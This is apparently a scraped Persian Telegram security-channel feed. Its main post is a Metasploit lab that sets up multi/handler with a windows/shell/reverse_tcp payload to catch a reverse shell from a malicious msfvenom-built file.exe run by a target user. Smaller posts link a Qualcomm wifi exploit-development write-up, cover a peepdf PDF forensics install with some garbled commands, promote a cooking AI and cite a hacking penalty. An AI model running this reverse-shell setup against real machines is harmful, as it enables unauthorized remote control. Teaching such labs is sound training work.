برای multi/handler، به توضیحات توجه کنید: "این ماژول یک stub است که تمام فیچر های متاسپلویت پیلود سیستم را برای اکسپلویت هایی که خارج از چارچوب راه اندازی شده اند، ارائه می دهد". پس از پیکربندی multi/handler، ما از یک کاربر خواهیم داشت که فایل مخرب ما را با استفاده از یک مرورگر دانلود کرده و آن را به صورت دستی اجرا می کند (بنابراین آن را خارج از چارچوب راه اندازی می کند). برنامه file.exe دوباره به multi/handler متصل می شود، جایی که ما آن را کنترل می کنیم.
ما می توانیم از multi/handler برای منتظر ماندن برای اتصال از file.exe استفاده کنیم.
از دستور use برای انتخاب multi/handler استفاده کنید.
ما می توانیم از multi/handler برای منتظر ماندن برای اتصال از file.exe استفاده کنیم.
از دستور use برای انتخاب multi/handler استفاده کنید.
msf5 > use exploit/multi/handler
درخواست شما کانتکست را برای گفتن msf5 exploit(multi/handler) تغییر می دهد > . این به شما میگوید که msfconsole زمینه ماژول خاص اکنون در حال اجرا است. اکنون میتوانیم تمام پیلودهای پرداختی را که با اکسپلویت انتخابی ما سازگار هستند، با اجرا مشاهده کنیم:
msf5 exploit(multi/handler) > show payloads
اگر این لیست را بررسی کنید، خواهید دید که windows/shell/reverse_tcp یکی از payloadهایی است که با اکسپلویت multi/handler کار می کند. این همان چیزی است که از آن استفاده خواهیم کرد تا با پیلود فایل file.exe که قبلاً ایجاد کردیم مطابقت داشته باشد.
از دستور set برای تنظیم گزینه PAYLOAD روی windows/shell/reverse_tcp استفاده کنید.
msf5 exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
درخواست شما کانتکست را برای گفتن msf5 exploit(multi/handler) تغییر می دهد > . این به شما میگوید که msfconsole زمینه ماژول خاص اکنون در حال اجرا است. اکنون میتوانیم تمام پیلودهای پرداختی را که با اکسپلویت انتخابی ما سازگار هستند، با اجرا مشاهده کنیم:
msf5 exploit(multi/handler) > show payloads
اگر این لیست را بررسی کنید، خواهید دید که windows/shell/reverse_tcp یکی از payloadهایی است که با اکسپلویت multi/handler کار می کند. این همان چیزی است که از آن استفاده خواهیم کرد تا با پیلود فایل file.exe که قبلاً ایجاد کردیم مطابقت داشته باشد.
از دستور set برای تنظیم گزینه PAYLOAD روی windows/shell/reverse_tcp استفاده کنید.
msf5 exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
وقتی file.exe را ساختیم، به msfvenom گفتیم که یک فایل EXE مخرب با استفاده از همین پیلود (windows/shell/reveise_tcp) بسازد. جالب است بدانید که اگر فایل مخربی مانند file.exe را با پیلودی متفاوت از پیلودی که با استفاده از multi/handler در msfconsole ارسال می کنیم پیکربندی کنیم، پیلود ارسال شده توسط multi/handler اولویت دارد! فایل مخرب ایجاد شده توسط متاسپلویت (مانند file.exe) یک پیلود متفاوت از مولتی/هندلر دریافت میکند که با آن پیلود متفاوت ساخته شده است و اجرا میکند، و هر یک از قابلیتهای payload خودش را نادیده میگیرد. با این حال، برای این آزمایشگاه، از همان payload در multi/handler استفاده خواهیم کرد که در file.exe با msfvenom استفاده کردیم. بیشتر پنتسترها از یک پیلود استفاده می کنند، بنابراین این همان کاری است که ما در اینجا انجام خواهیم داد.
پس از انتخاب یک پیلود، به تمام گزینههایی که میتوانید با اجرای گزینههای show options کنید، نگاه کنید.
#metasploit
@TryHackBox
پس از انتخاب یک پیلود، به تمام گزینههایی که میتوانید با اجرای گزینههای show options کنید، نگاه کنید.
#metasploit
@TryHackBox
دستور show options برخی از گزینههای مهم مانند LHOST و LPORT را نشان میدهد (آدرس IP و شماره پورتی که پیلود تحویل داده شده به آن متصل میشود).
LHOST
را برای payload روی آدرس IP لینوکس خود تنظیم کنید تا وقتی پیلود روی تارگت ویندوز اجرا می شود، payload بتواند دوباره به دستگاه لینوکس شما متصل شود. (دوباره، توجه داشته باشید که اگر آدرس دیگری را در اینجا انتخاب کنیم، میتوانیم LHOST را که در file.exe ساختهایم لغو کنیم، زیرا پیلود multi/handler و پیکربندی آن بر پیلود فایل file.exe لغو میشود. اما ما از همان آدرس آدرس خود استفاده میکنیم. دستگاه لینوکس برای این آزمایشگاه.) LHOST را روی 0. 0 . 0 . 0 تنظیم می کنیم. بنابراین در تمام رابط ها گوش می دهد. در این مورد، فایل payload ما (file.exe) می داند که به کجا متصل شود، زیرا LHOST را با msfvenom ارائه کرده ایم.
LHOST و LPORT را تنظیم کنید، سپس تنظیمات را با show options تأیید کنید.
در شکل زیر خواهید دید
LHOST
را برای payload روی آدرس IP لینوکس خود تنظیم کنید تا وقتی پیلود روی تارگت ویندوز اجرا می شود، payload بتواند دوباره به دستگاه لینوکس شما متصل شود. (دوباره، توجه داشته باشید که اگر آدرس دیگری را در اینجا انتخاب کنیم، میتوانیم LHOST را که در file.exe ساختهایم لغو کنیم، زیرا پیلود multi/handler و پیکربندی آن بر پیلود فایل file.exe لغو میشود. اما ما از همان آدرس آدرس خود استفاده میکنیم. دستگاه لینوکس برای این آزمایشگاه.) LHOST را روی 0. 0 . 0 . 0 تنظیم می کنیم. بنابراین در تمام رابط ها گوش می دهد. در این مورد، فایل payload ما (file.exe) می داند که به کجا متصل شود، زیرا LHOST را با msfvenom ارائه کرده ایم.
LHOST و LPORT را تنظیم کنید، سپس تنظیمات را با show options تأیید کنید.
در شکل زیر خواهید دید
👍2👎1
دوستان اگر مهارتی در برنامه نویسی هر زبانی و حوزه های امنیت دارید یا حتی یک دوره رو خوب بلد هستید و نسبتا متوسط و مایل هستید اون دانش برای دیگر دوستان آموزش بدید و برای خودتون مرور بشه میتونید در کانال ما شروع به تولید محتوا کنید .
آیدی جهت ارتباط :
@Thb_Support
یا
@Unique_exploitbot
آیدی جهت ارتباط :
@Thb_Support
یا
@Unique_exploitbot
👍2
Try Hack Box
Photo
برای فعال کردن multi/handler، لطفا دستور زیر را اجرا کنید:
msf5 exploit(multi/handler) > exploit
msf5 exploit(multi/handler) > exploit
وقتی اکسپلویت را به خودی خود اجرا می کنید، اعلان msfconsole شما را متصل می کند. برای انعطافپذیری بیشتر، میخواهیم msfconsole را برگردانیم و multi/handler را در پسزمینه اجرا کنیم. برای انجام این کار، CTRL-C را فشار دهید تا مولتی/هندلر متوقف شود:
اکنون دستور exploit را با گزینه -j اجرا کنید تا اجرای exploit "jobify" باشد:
msf5 exploit(multi/handler) > exploit -j
msf5 exploit(multi/handler) > exploit -j
اکنون باید نشانهای ببینید که مولتی/هندلر در پسزمینه گوش میدهد و از msfconsole شما خواسته میشود.
در هر زمان، میتوانید با اجرای زیر فهرستی از کارهای پسزمینه را از msfconsole دریافت کنید:
در هر زمان، میتوانید با اجرای زیر فهرستی از کارهای پسزمینه را از msfconsole دریافت کنید:
ChefGPT
یک شبکه عصبی است که به شما در پختن غذا کمک می کند.
هر چه ورودی بیشتر باشد، بهتر است! برای استفاده موفقیت آمیز از هوش مصنوعی، به شما پیشنهاد می شود:
1. فهرستی از مواد موجود را وارد کنید.
2. آنچه در آشپزخانه دارید (فر، مخلوط کن، توستر و غیره) را مشخص کنید.
3. مشخص کنید که چقدر زمان دارید.
4. سطح مهارت های خود را در آشپزی نشان دهید.
5. حالت "Gourmet" یا "ALL" را انتخاب کنید، i.e. از مواد به طور جداگانه یا با هم استفاده کنید.
ما مزیت های شبکه های عصبی را می چشیم.
برای آشپزهای کانال :)
#سرویس #هوش_مصنوعی
@TryHackBox
یک شبکه عصبی است که به شما در پختن غذا کمک می کند.
هر چه ورودی بیشتر باشد، بهتر است! برای استفاده موفقیت آمیز از هوش مصنوعی، به شما پیشنهاد می شود:
1. فهرستی از مواد موجود را وارد کنید.
2. آنچه در آشپزخانه دارید (فر، مخلوط کن، توستر و غیره) را مشخص کنید.
3. مشخص کنید که چقدر زمان دارید.
4. سطح مهارت های خود را در آشپزی نشان دهید.
5. حالت "Gourmet" یا "ALL" را انتخاب کنید، i.e. از مواد به طور جداگانه یا با هم استفاده کنید.
ما مزیت های شبکه های عصبی را می چشیم.
برای آشپزهای کانال :)
#سرویس #هوش_مصنوعی
@TryHackBox
ChefGPT
Never Worry About What's for Dinner Again! Simply input the ingredients in your pantry and let ChefGPT generate a delicious recipe for you using AI.
👍4🔥1
wifi driver linux exploit dev firstone for fun and profit
http://vrgl.ir/5IRUi
#توسعه_اکسپلویت
#exploit #exploitation
@TryHackBox
http://vrgl.ir/5IRUi
#توسعه_اکسپلویت
#exploit #exploitation
@TryHackBox
از طریق مهندسی معکوس فریمور بخش مربوط به qualcomm و exploitation این بخش شما میتونید در دیوایس هایی که در واقع گوشی شما از qualcomm استفاده میکنه یا دیوایس وایرلس شما از این استفاده میکنه میتونید توسعه اکسپلویت رو انجام بدین و در محیط wlan دسترسی شل بگیرید
اینم روش دامپ کردن فرمور مربوط به qualcomm
http://www.youtube.com/watch?v=aNjgBNEjF88
اینم روش دامپ کردن فرمور مربوط به qualcomm
http://www.youtube.com/watch?v=aNjgBNEjF88
YouTube
Read/Write Qualcomm Firmware/DUMP With Z3X EFM
https://smartjtagbox.com/owncloud/s/cpFGnWtCtS5KDgf
pass : 12345678
pass : 12345678
Try Hack Box
به کانال ما چند امتیاز میدید ؟
هر امتیازی که دادید دلیلشو بگید برای بهتر شدن آموزش ها در چنل و هم برای خودتون تلاش لازمه رو انجام بدیم .
مجازات هک وای فای!!!!
🔺براساس ماده ۱۲ قانون جرایم رایانه ای فردی که به صورت غیرمجاز داده های دیگران را برباید چنانچه عین داده ها در اختیار صاحب آن باشد فرد به جزای نقدی و در غیر این صورت به حبس از ۹۱ روز تا یکسال یا هردو مجازات باهم محکوم میشود بنابراین این عمل مصداق جرم سرقت رایانه ای محسوب میشود.
@TryHackBox
🔺براساس ماده ۱۲ قانون جرایم رایانه ای فردی که به صورت غیرمجاز داده های دیگران را برباید چنانچه عین داده ها در اختیار صاحب آن باشد فرد به جزای نقدی و در غیر این صورت به حبس از ۹۱ روز تا یکسال یا هردو مجازات باهم محکوم میشود بنابراین این عمل مصداق جرم سرقت رایانه ای محسوب میشود.
@TryHackBox
PEEPDF
ابزار فارنزیک اسناد PDF
اکثر حملات مهندسی اجتماعی از یک سند PDF مخرب حاوی اسکریپت های جاوا و شل کدها استفاده می کنند.
Peepdf
می تواند اشیاء مشکوک و جریان های داده را در یک سند PDF تجزیه و تحلیل کند.
با نصب برخی افزونه ها، یک محقق امنیتی می تواند اسکریپت های جاوا و شل کدها را با جزئیات تجزیه و تحلیل کند.
ویژگی های اصلی peepdf عبارتند از:
تجزیه یک سند PDF
استخراج داده ها از فایل های رمزگذاری شده .
یک محقق امنیتی می تواند از این ابزار برای بررسی شل های مخفی یا اسکریپت های جاوا یا حتی آسیب پذیری های استاندارد مانند CVE-2013-2729 و غیره استفاده کند.
یکی دیگر از برنامه های کاربردی آشکارا برای جرم شناسی است.
میتواند تمام ابردادهها و جریانهای داده را در یک سند استخراج کند تا محقق بتواند از آن برای تطبیق الگو، تجزیه شل کد، یا صرفاً برای استخراج ابرداده، تشخیص وجود کد مخرب و استفاده از آن به عنوان مدرک استفاده کند.
گزینه ها - Peepdf
آزمایشگاه 1: نصب Spidermonkey و Pylibemu
در این قسمت 3 بسته اضافی را نصب می کنیم تا بتوانیم جاوا اسکریپت و shellcode را تجزیه کنیم.
اینها بسته های زیر هستند:
libemu
- شبیه سازی اولیه x86 و شناسایی شل
Pylibemu
- پایتون برای کتابخانه libemu
Spidermonkey
- موتور جاوا اسکریپت
مرحله 1: Libemu را نصب کنید
ابتدا باید فایل های پایتون لازم را نصب کنیم.
بسته را از Git کلون کنید.
مطمئن شوید که git-core را نصب کرده اید.
کالی به همراه git از قبل نصب شده است.
libemu را از git راه اندازی و نصب کنید.
cd
مرحله 2: Pylibemu را نصب کنید
کلون git
https://github.com/buffer/pylibemu.git
pylibemu را نصب کنید
مرحله 3: Spidermonkey را نصب کنید
peepdf را اجرا کنید و بررسی کنید که آیا بسته ها به درستی نصب شده اند یا خیر.
فقط هر فایل PDF را با آن امتحان کنید.
اگر افزونه ها به درستی نصب نشده باشند، وقتی peepdf را اجرا می کنید، پیامی مبنی بر نصب نشدن بسته ها دریافت می کنید.
در آموزش های بعدی نگاهی دقیق تر به استفاده از peepdf خواهیم داشت.
#Forensic
@TryHackBox
ابزار فارنزیک اسناد PDF
اکثر حملات مهندسی اجتماعی از یک سند PDF مخرب حاوی اسکریپت های جاوا و شل کدها استفاده می کنند.
Peepdf
می تواند اشیاء مشکوک و جریان های داده را در یک سند PDF تجزیه و تحلیل کند.
با نصب برخی افزونه ها، یک محقق امنیتی می تواند اسکریپت های جاوا و شل کدها را با جزئیات تجزیه و تحلیل کند.
ویژگی های اصلی peepdf عبارتند از:
تجزیه یک سند PDF
استخراج داده ها از فایل های رمزگذاری شده .
یک محقق امنیتی می تواند از این ابزار برای بررسی شل های مخفی یا اسکریپت های جاوا یا حتی آسیب پذیری های استاندارد مانند CVE-2013-2729 و غیره استفاده کند.
یکی دیگر از برنامه های کاربردی آشکارا برای جرم شناسی است.
میتواند تمام ابردادهها و جریانهای داده را در یک سند استخراج کند تا محقق بتواند از آن برای تطبیق الگو، تجزیه شل کد، یا صرفاً برای استخراج ابرداده، تشخیص وجود کد مخرب و استفاده از آن به عنوان مدرک استفاده کند.
گزینه ها - Peepdf
Syntax: peepdf <options> PDF-FILE
-h, --help show this help message and exit
-i, --interactive Sets console mode.
-s SCRIPTFILE, --load-noscript=SCRIPTFILE Loads the commands stored in the specified file and execute them.
-f, --force-mode Sets force parsing mode to ignore errors.
-l, --loose-mode Sets loose parsing mode to catch malformed objects.
-u, --update Updates peepdf with the latest files from the repository.
-g, --grinch-mode Avoids colorized output in the interactive console.
-v, --version Shows program's version number.
-x, --xml Shows the document information in XML format.آزمایشگاه 1: نصب Spidermonkey و Pylibemu
در این قسمت 3 بسته اضافی را نصب می کنیم تا بتوانیم جاوا اسکریپت و shellcode را تجزیه کنیم.
اینها بسته های زیر هستند:
libemu
- شبیه سازی اولیه x86 و شناسایی شل
Pylibemu
- پایتون برای کتابخانه libemu
Spidermonkey
- موتور جاوا اسکریپت
مرحله 1: Libemu را نصب کنید
ابتدا باید فایل های پایتون لازم را نصب کنیم.
apt-get-inبسته را از Git کلون کنید.
مطمئن شوید که git-core را نصب کرده اید.
کالی به همراه git از قبل نصب شده است.
git clone git://git.carnivore.it/lilibemu را از git راه اندازی و نصب کنید.
cd
مرحله 2: Pylibemu را نصب کنید
کلون git
https://github.com/buffer/pylibemu.git
pylibemu را نصب کنید
echo "/opt/libemu/lib" > /etc/ld.so.conf.d/pylibemu.conf
python setup.py build
python setup.py install
مرحله 3: Spidermonkey را نصب کنید
apt-get install python-pyrex
svn checkout http://python-spidermonkey.googlecode.com/svn/trunk/ python-spidermonkey
cd python-spidermonkey
python setup.py build
python setup.py install
ldconfigpeepdf را اجرا کنید و بررسی کنید که آیا بسته ها به درستی نصب شده اند یا خیر.
فقط هر فایل PDF را با آن امتحان کنید.
peepdf evil.pdf <replace with yous>اگر افزونه ها به درستی نصب نشده باشند، وقتی peepdf را اجرا می کنید، پیامی مبنی بر نصب نشدن بسته ها دریافت می کنید.
در آموزش های بعدی نگاهی دقیق تر به استفاده از peepdf خواهیم داشت.
#Forensic
@TryHackBox
GitHub
GitHub - buffer/pylibemu: A Libemu Cython wrapper
A Libemu Cython wrapper. Contribute to buffer/pylibemu development by creating an account on GitHub.
👍7